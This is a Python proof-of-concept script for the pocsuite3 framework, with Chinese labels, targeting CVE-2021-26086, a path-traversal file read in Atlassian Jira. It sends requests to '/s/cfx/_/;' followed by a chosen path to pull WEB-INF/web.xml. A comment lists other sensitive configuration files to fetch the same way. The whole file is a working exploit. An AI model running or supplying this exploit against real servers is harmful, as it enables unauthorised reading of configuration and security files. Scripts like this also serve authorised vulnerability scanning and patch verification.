Atlassian Jira cfx 任意文件读取漏洞 CVE-2021-26086.py

from pocsuite3.lib.core.data import logger
from collections import OrderedDict
from urllib.parse import urljoin
from requests.exceptions import ReadTimeout
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, REVERSE_PAYLOAD, OptString, OptItems, \
    OptDict, VUL_TYPE
from pocsuite3.lib.utils import get_middle_text
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class DemoPOC(POCBase):
    vulID = '4'
    name = 'Atlassian Jira cfx 任意文件读取漏洞 CVE-2021-26086'
    desc = '''Atlassian Jira cfx'''
    appName = 'Atlassian Jira cfx'
    appVersion = '未知版本'
    samples = []
    install_requires = ['']
    vulType = VUL_TYPE.PATH_DISCLOSURE

    def _options(self):
        o = OrderedDict()
        o["filename"] = OptString("/WEB-INF/web.xml", description='文件读取自定义命令')
        return o
        '''
        可读取敏感配置文件
        WEB-INF/web.xml
        WEB-INF/decorators.xml
        WEB-INF/classes/seraph-config.xml
        META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
        META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
        META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
        META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
        '''
    def _verify(self):
        result = {}
        target = self.url + "/s/cfx/_/;" + self.get_option("filename")
        try:
            r = requests.get(url=target,verify=False, timeout=5,allow_redirects=False)
            print(target)
            if r.status_code == 200 and '<?xml version="1.0"?>' in r.text: 
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target
                result['VerifyInfo']['filename'] = self.get_option("filename")
        except:
            pass

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)